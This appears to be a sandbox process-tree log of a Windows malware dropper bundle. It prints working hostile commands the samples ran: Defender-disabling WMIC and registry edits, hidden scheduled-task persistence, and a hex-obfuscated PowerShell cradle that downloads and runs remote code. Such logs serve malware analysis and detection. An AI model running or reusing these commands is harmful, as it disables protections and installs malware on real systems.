C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &13⤵PID:1332
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"14⤵PID:6024
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:6476
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:6740
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True17⤵PID:6368
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"14⤵PID:9948
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:5652
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:7248
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"13⤵PID:4336
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&14⤵PID:208
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3215⤵PID:3892
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6415⤵PID:2836
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"13⤵PID:5024
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&14⤵PID:7436
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3215⤵PID:1148
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6415⤵PID:7896
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnXOIwurT" /SC once /ST 10:34:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="13⤵
- Creates scheduled task(s)
PID:7692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnXOIwurT"13⤵PID:6548
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yqrd4c5q.d5x\askinstall52.exe & exit9⤵PID:5684
-
C:\Users\Admin\AppData\Local\Temp\yqrd4c5q.d5x\askinstall52.exeC:\Users\Admin\AppData\Local\Temp\yqrd4c5q.d5x\askinstall52.exe10⤵PID:6576
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe11⤵PID:756
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe12⤵
- Kills process with taskkill
PID:4192
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r3gqcaey.txm\Cleanpro13.exe & exit9⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\r3gqcaey.txm\Cleanpro13.exeC:\Users\Admin\AppData\Local\Temp\r3gqcaey.txm\Cleanpro13.exe10⤵PID:5600
-
C:\Users\Admin\Documents\I4b1sguuZvXLoSGWKO6SRBo5.exe"C:\Users\Admin\Documents\I4b1sguuZvXLoSGWKO6SRBo5.exe"11⤵PID:6640
-
-
C:\Users\Admin\Documents\PvtCQaTQqlFBtLmSpSFlUxgS.exe"C:\Users\Admin\Documents\PvtCQaTQqlFBtLmSpSFlUxgS.exe"11⤵PID:6652
-
-
C:\Users\Admin\Documents\QRbBihrFhLurLq46TrX_kGy5.exe"C:\Users\Admin\Documents\QRbBihrFhLurLq46TrX_kGy5.exe"11⤵PID:4280
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\QRbBihrFhLurLq46TrX_kGy5.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\QRbBihrFhLurLq46TrX_kGy5.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )12⤵PID:1564
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\QRbBihrFhLurLq46TrX_kGy5.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\QRbBihrFhLurLq46TrX_kGy5.exe" ) do taskkill /f -im "%~nxA"13⤵PID:7708
-
C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXEX4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV14⤵PID:9108
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV ""== """" for %A IN (""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )15⤵PID:10176
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "QRbBihrFhLurLq46TrX_kGy5.exe"14⤵
- Kills process with taskkill
PID:5460
-
-
-
-
-
C:\Users\Admin\Documents\QBQzRnvAj5sMSZqBR37tjKKj.exe"C:\Users\Admin\Documents\QBQzRnvAj5sMSZqBR37tjKKj.exe"11⤵PID:5156
-
C:\Users\Admin\Documents\QBQzRnvAj5sMSZqBR37tjKKj.exe"C:\Users\Admin\Documents\QBQzRnvAj5sMSZqBR37tjKKj.exe"12⤵PID:7536
-
-
-
C:\Users\Admin\Documents\fG01coQzlnM7kHCewVvt7tx2.exe"C:\Users\Admin\Documents\fG01coQzlnM7kHCewVvt7tx2.exe"11⤵PID:204
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"12⤵PID:7836
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"13⤵PID:4808
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"12⤵PID:9824
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffd8a6e4f50,0x7ffd8a6e4f60,0x7ffd8a6e4f7013⤵PID:9936
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 204 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\fG01coQzlnM7kHCewVvt7tx2.exe"12⤵PID:9324
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 20413⤵
- Kills process with taskkill
PID:9292
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 204 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\fG01coQzlnM7kHCewVvt7tx2.exe"12⤵PID:7680
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 20413⤵
- Kills process with taskkill
PID:7368
-
-
-
-
C:\Users\Admin\Documents\hOILsBI_M9kCLusbsCortAlX.exe"C:\Users\Admin\Documents\hOILsBI_M9kCLusbsCortAlX.exe"11⤵PID:5248
-
-
C:\Users\Admin\Documents\JBWqv5GZZhyMm2k4bcKRcCsN.exe"C:\Users\Admin\Documents\JBWqv5GZZhyMm2k4bcKRcCsN.exe"11⤵PID:2828
-
C:\Users\Admin\Documents\JBWqv5GZZhyMm2k4bcKRcCsN.exe"C:\Users\Admin\Documents\JBWqv5GZZhyMm2k4bcKRcCsN.exe"12⤵PID:7748
-
-
-
C:\Users\Admin\Documents\MZhxntRbcmOlGwChLEerVriF.exe"C:\Users\Admin\Documents\MZhxntRbcmOlGwChLEerVriF.exe"11⤵PID:2368
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"12⤵PID:1000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST12⤵
- Creates scheduled task(s)
PID:2292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST12⤵
- Creates scheduled task(s)
PID:4004
-
-
-
C:\Users\Admin\Documents\0gKIMlY7vzHPR64LZvW37NYk.exe"C:\Users\Admin\Documents\0gKIMlY7vzHPR64LZvW37NYk.exe"11⤵PID:4752
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe12⤵PID:7484
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Nobile.docm12⤵PID:7560
-
C:\Windows\SysWOW64\cmd.execmd13⤵PID:7720
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm14⤵PID:7612
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.comRimasta.exe.com J14⤵PID:5440
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com J15⤵PID:8568
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com J16⤵PID:8948
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com J17⤵PID:8200
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rimasta.exe.com J18⤵PID:8480
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exe19⤵PID:9060
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost14⤵
- Runs ping.exe
PID:8232
-
-
-
-
-
C:\Users\Admin\Documents\tFrfaZnX1_IzC86XaHG4irv6.exe"C:\Users\Admin\Documents\tFrfaZnX1_IzC86XaHG4irv6.exe"11⤵PID:5568
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im tFrfaZnX1_IzC86XaHG4irv6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\tFrfaZnX1_IzC86XaHG4irv6.exe" & del C:\ProgramData\*.dll & exit12⤵PID:3892
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im tFrfaZnX1_IzC86XaHG4irv6.exe /f13⤵
- Kills process with taskkill
PID:7344
-
-
-
-
C:\Users\Admin\Documents\Qgkb2P6cA2a0wYKqHFIKEjc1.exe"C:\Users\Admin\Documents\Qgkb2P6cA2a0wYKqHFIKEjc1.exe"11⤵PID:2172
-
-
C:\Users\Admin\Documents\J5K_KheeObVpv1i8yBTSltv4.exe"C:\Users\Admin\Documents\J5K_KheeObVpv1i8yBTSltv4.exe"11⤵PID:2208
-
C:\Users\Admin\Documents\J5K_KheeObVpv1i8yBTSltv4.exe"C:\Users\Admin\Documents\J5K_KheeObVpv1i8yBTSltv4.exe"12⤵PID:7380
-
-
-
C:\Users\Admin\Documents\6yYZN7Wh1AXS2c2KVJKcjiyp.exe"C:\Users\Admin\Documents\6yYZN7Wh1AXS2c2KVJKcjiyp.exe"11⤵PID:1008
-
-
C:\Users\Admin\Documents\vMMcRvKo3vJf6PhyzbA2Qwfs.exe"C:\Users\Admin\Documents\vMMcRvKo3vJf6PhyzbA2Qwfs.exe"11⤵PID:1524
-
-
C:\Users\Admin\Documents\GroOnQTdxcj6vXaDA0EPtT9Y.exe"C:\Users\Admin\Documents\GroOnQTdxcj6vXaDA0EPtT9Y.exe"11⤵PID:7348
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"12⤵PID:7456
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"12⤵PID:7336
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"12⤵PID:7572
-
-
-
C:\Users\Admin\Documents\UnxvYCIMOGUi8f9wkA0SrmfR.exe"C:\Users\Admin\Documents\UnxvYCIMOGUi8f9wkA0SrmfR.exe"11⤵PID:7396
-
-
C:\Users\Admin\Documents\A06WbB5_f9KtstFPdTxGbT1b.exe"C:\Users\Admin\Documents\A06WbB5_f9KtstFPdTxGbT1b.exe"11⤵PID:7420
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SOS='24#4e#61#6e#6f#3d#27#4a#4f#4f#45#58#27#2e#72#65#70#6c#61#63#65#28#27#4a#4f#4f#27#2c#27#49#27#29#3b#73#61#6c#20#4f#59#20#24#4e#61#6e#6f#3b#64#6f#20#7b#24#70#69#6e#67#20#3d#20#74#65#73#74#2d#63#6f#6e#6e#65#63#74#69#6f#6e#20#2d#63#6f#6d#70#20#67#6f#6f#67#6c#65#2e#63#6f#6d#20#2d#63#6f#75#6e#74#20#31#20#2d#51#75#69#65#74#7d#20#75#6e#74#69#6c#20#28#24#70#69#6e#67#29#3b#24#70#32#32#20#3d#20#5b#45#6e#75#6d#5d#3a#3a#54#6f#4f#62#6a#65#63#74#28#5b#53#79#73#74#65#6d#2e#4e#65#74#2e#53#65#63#75#72#69#74#79#50#72#6f#74#6f#63#6f#6c#54#79#70#65#5d#2c#20#33#30#37#32#29#3b#5b#53#79#73#74#65#6d#2e#4e#65#74#2e#53#65#72#76#69#63#65#50#6f#69#6e#74#4d#61#6e#61#67#65#72#5d#3a#3a#53#65#63#75#72#69#74#79#50#72#6f#74#6f#63#6f#6c#20#3d#20#24#70#32#32#3b#24#61#61#3d#27#77#68#65#78#2d#4f#62#68#65#78#6a#65#27#3b#24#6c#6c#3d#27#28#27#27#68#68#65#78#74#74#68#65#78#70#73#3a#68#65#78#2f#68#65#78#68#65#78#2f#6d#61#6e#6f#72#61#6b#75#73#2e#74#6f#70#2f#50#30#57#33#52#31#2f#49#4e#2e#50#4e#47#27#27#29#27#3b#20#24#62#62#3d#27#63#68#65#78#74#20#4e#65#68#65#78#68#65#78#74#2e#57#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#65#27#3b#20#24#66#66#3d#27#6c#6f#68#65#78#68#65#78#61#64#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#53#27#3b#20#24#68#68#3d#27#74#68#65#78#68#65#78#72#69#68#65#78#68#65#78#68#65#78#6e#67#27#3b#20#24#63#31#3d#27#28#68#65#78#68#65#78#4e#68#65#78#68#65#78#68#65#78#68#65#78#65#27#3b#20#24#63#63#3d#27#62#43#68#65#78#68#65#78#68#65#78#6c#69#65#68#65#78#68#65#78#68#65#78#6e#74#27#3b#20#24#64#64#3d#27#29#2e#44#6f#68#65#78#68#65#78#68#65#78#68#65#78#77#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#6e#27#3b#20#24#52#4f#4f#4d#3d#28#24#63#31#2c#24#61#61#2c#24#62#62#2c#24#63#63#2c#24#64#64#2c#24#66#66#2c#24#68#68#2c#24#6c#6c#20#2d#4a#6f#69#6e#20#27#27#29#3b#24#52#4f#4f#4d#3d#24#52#4f#4f#4d#2e#72#65#70#6c#61#63#65#28#27#68#65#78#27#2c#20#27#27#29#3b#20#4f#59#20#24#52#4f#4f#4d#7c#4f#59#3b';Invoke-Expression (-join ($SOS -split '#' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))12⤵PID:3644
-
-
-
C:\Users\Admin\Documents\4vxFy_Ee6bOhN04lcQHg_OZ4.exe"C:\Users\Admin\Documents\4vxFy_Ee6bOhN04lcQHg_OZ4.exe"11⤵PID:7632
-
-
C:\Users\Admin\Documents\A2HnY2KU3NCRuTKtkjLtoWlo.exe"C:\Users\Admin\Documents\A2HnY2KU3NCRuTKtkjLtoWlo.exe"11⤵PID:8112
-
C:\Users\Admin\Documents\A2HnY2KU3NCRuTKtkjLtoWlo.exe"C:\Users\Admin\Documents\A2HnY2KU3NCRuTKtkjLtoWlo.exe"12⤵PID:7284
-
-
C:\ProgramData\Stub.exe"C:\ProgramData\Stub.exe"12⤵PID:8164
-
C:\Users\Admin\AppData\Local\DriverAudioOption.exe"C:\Users\Admin\AppData\Local\DriverAudioOption.exe"13⤵PID:5884
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\Admin\AppData\Roaming\AudioEngine.exe"' & exit14⤵PID:8236
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "AudioEngine" /tr '"C:\Users\Admin\AppData\Roaming\AudioEngine.exe"'15⤵
- Creates scheduled task(s)
PID:9372
-
-
-
C:\Users\Admin\AppData\Roaming\AudioEngine.exe"C:\Users\Admin\AppData\Roaming\AudioEngine.exe"14⤵PID:9648
-
-
-
C:\Users\Admin\AppData\Local\Temp\IntilizateComponentFord.exe"C:\Users\Admin\AppData\Local\Temp\IntilizateComponentFord.exe"13⤵PID:7184
-
-
-
C:\Users\Admin\Documents\A2HnY2KU3NCRuTKtkjLtoWlo.exe"C:\Users\Admin\Documents\A2HnY2KU3NCRuTKtkjLtoWlo.exe"12⤵PID:7008
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i1wzg501.42s\Vidboxinc.exe & exit9⤵PID:6796
-
C:\Users\Admin\AppData\Local\Temp\i1wzg501.42s\Vidboxinc.exeC:\Users\Admin\AppData\Local\Temp\i1wzg501.42s\Vidboxinc.exe10⤵PID:6924
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Vidboxinc.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\i1wzg501.42s\Vidboxinc.exe" & del C:\ProgramData\*.dll & exit11⤵PID:8940
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Vidboxinc.exe /f12⤵
- Kills process with taskkill
PID:9040
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0cp0eixw.mfe\gcleaner.exe /mixfive & exit9⤵PID:6472
-
C:\Users\Admin\AppData\Local\Temp\0cp0eixw.mfe\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\0cp0eixw.mfe\gcleaner.exe /mixfive10⤵PID:4736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxvscj3d.z15\bumperWW1.exe & exit9⤵PID:4548
-
C:\Users\Admin\AppData\Local\Temp\fxvscj3d.z15\bumperWW1.exeC:\Users\Admin\AppData\Local\Temp\fxvscj3d.z15\bumperWW1.exe10⤵PID:668
-
C:\Users\Admin\Documents\JDBiDv4ME0xGTw5mliDBpD6Z.exe"C:\Users\Admin\Documents\JDBiDv4ME0xGTw5mliDBpD6Z.exe"11⤵PID:9056
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SOS='24#4e#61#6e#6f#3d#27#4a#4f#4f#45#58#27#2e#72#65#70#6c#61#63#65#28#27#4a#4f#4f#27#2c#27#49#27#29#3b#73#61#6c#20#4f#59#20#24#4e#61#6e#6f#3b#64#6f#20#7b#24#70#69#6e#67#20#3d#20#74#65#73#74#2d#63#6f#6e#6e#65#63#74#69#6f#6e#20#2d#63#6f#6d#70#20#67#6f#6f#67#6c#65#2e#63#6f#6d#20#2d#63#6f#75#6e#74#20#31#20#2d#51#75#69#65#74#7d#20#75#6e#74#69#6c#20#28#24#70#69#6e#67#29#3b#24#70#32#32#20#3d#20#5b#45#6e#75#6d#5d#3a#3a#54#6f#4f#62#6a#65#63#74#28#5b#53#79#73#74#65#6d#2e#4e#65#74#2e#53#65#63#75#72#69#74#79#50#72#6f#74#6f#63#6f#6c#54#79#70#65#5d#2c#20#33#30#37#32#29#3b#5b#53#79#73#74#65#6d#2e#4e#65#74#2e#53#65#72#76#69#63#65#50#6f#69#6e#74#4d#61#6e#61#67#65#72#5d#3a#3a#53#65#63#75#72#69#74#79#50#72#6f#74#6f#63#6f#6c#20#3d#20#24#70#32#32#3b#24#61#61#3d#27#77#68#65#78#2d#4f#62#68#65#78#6a#65#27#3b#24#6c#6c#3d#27#28#27#27#68#68#65#78#74#74#68#65#78#70#73#3a#68#65#78#2f#68#65#78#68#65#78#2f#6d#61#6e#6f#72#61#6b#75#73#2e#74#6f#70#2f#50#30#57#33#52#31#2f#49#4e#2e#50#4e#47#27#27#29#27#3b#20#24#62#62#3d#27#63#68#65#78#74#20#4e#65#68#65#78#68#65#78#74#2e#57#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#65#27#3b#20#24#66#66#3d#27#6c#6f#68#65#78#68#65#78#61#64#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#53#27#3b#20#24#68#68#3d#27#74#68#65#78#68#65#78#72#69#68#65#78#68#65#78#68#65#78#6e#67#27#3b#20#24#63#31#3d#27#28#68#65#78#68#65#78#4e#68#65#78#68#65#78#68#65#78#68#65#78#65#27#3b#20#24#63#63#3d#27#62#43#68#65#78#68#65#78#68#65#78#6c#69#65#68#65#78#68#65#78#68#65#78#6e#74#27#3b#20#24#64#64#3d#27#29#2e#44#6f#68#65#78#68#65#78#68#65#78#68#65#78#77#68#65#78#68#65#78#68#65#78#68#65#78#68#65#78#6e#27#3b#20#24#52#4f#4f#4d#3d#28#24#63#31#2c#24#61#61#2c#24#62#62#2c#24#63#63#2c#24#64#64#2c#24#66#66#2c#24#68#68#2c#24#6c#6c#20#2d#4a#6f#69#6e#20#27#27#29#3b#24#52#4f#4f#4d#3d#24#52#4f#4f#4d#2e#72#65#70#6c#61#63#65#28#27#68#65#78#27#2c#20#27#27#29#3b#20#4f#59#20#24#52#4f#4f#4d#7c#4f#59#3b';Invoke-Expression (-join ($SOS -split '#' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))12⤵PID:9732
-
-
-
C:\Users\Admin\Documents\2bLelwCXFQRQ3Tq_Kx4q6Tcf.exe"C:\Users\Admin\Documents\2bLelwCXFQRQ3Tq_Kx4q6Tcf.exe"11⤵PID:8288
-
-
C:\Users\Admin\Documents\en0brjHEJZhENHSEk30lKZSB.exe"C:\Users\Admin\Documents\en0brjHEJZhENHSEk30lKZSB.exe"11⤵PID:8636
-
-
C:\Users\Admin\Documents\UMTgoXVwz3LtIzI2Tpdww8zI.exe"C:\Users\Admin\Documents\UMTgoXVwz3LtIzI2Tpdww8zI.exe"11⤵PID:7848
-
-
C:\Users\Admin\Documents\FEwX8l8WkExNSMeJ9Uj_UmVg.exe"C:\Users\Admin\Documents\FEwX8l8WkExNSMeJ9Uj_UmVg.exe"11⤵PID:4820
-
C:\Users\Admin\Documents\FEwX8l8WkExNSMeJ9Uj_UmVg.exe"C:\Users\Admin\Documents\FEwX8l8WkExNSMeJ9Uj_UmVg.exe"12⤵PID:9296
-
-
C:\ProgramData\Stub.exe"C:\ProgramData\Stub.exe"12⤵PID:9528
-
C:\Users\Admin\AppData\Local\DriverAudioOption.exe"C:\Users\Admin\AppData\Local\DriverAudioOption.exe"13⤵PID:2824
-
-
C:\Users\Admin\AppData\Local\Temp\IntilizateComponentFord.exe"C:\Users\Admin\AppData\Local\Temp\IntilizateComponentFord.exe"13⤵PID:7404
-
-
-
-
C:\Users\Admin\Documents\W_hndwM0K_N5Ir0SeZtcZu1p.exe"C:\Users\Admin\Documents\W_hndwM0K_N5Ir0SeZtcZu1p.exe"11⤵PID:8692
-
-
C:\Users\Admin\Documents\vcs1tNqWsznqEHbWpHqiruqd.exe"C:\Users\Admin\Documents\vcs1tNqWsznqEHbWpHqiruqd.exe"11⤵PID:8188
-
-
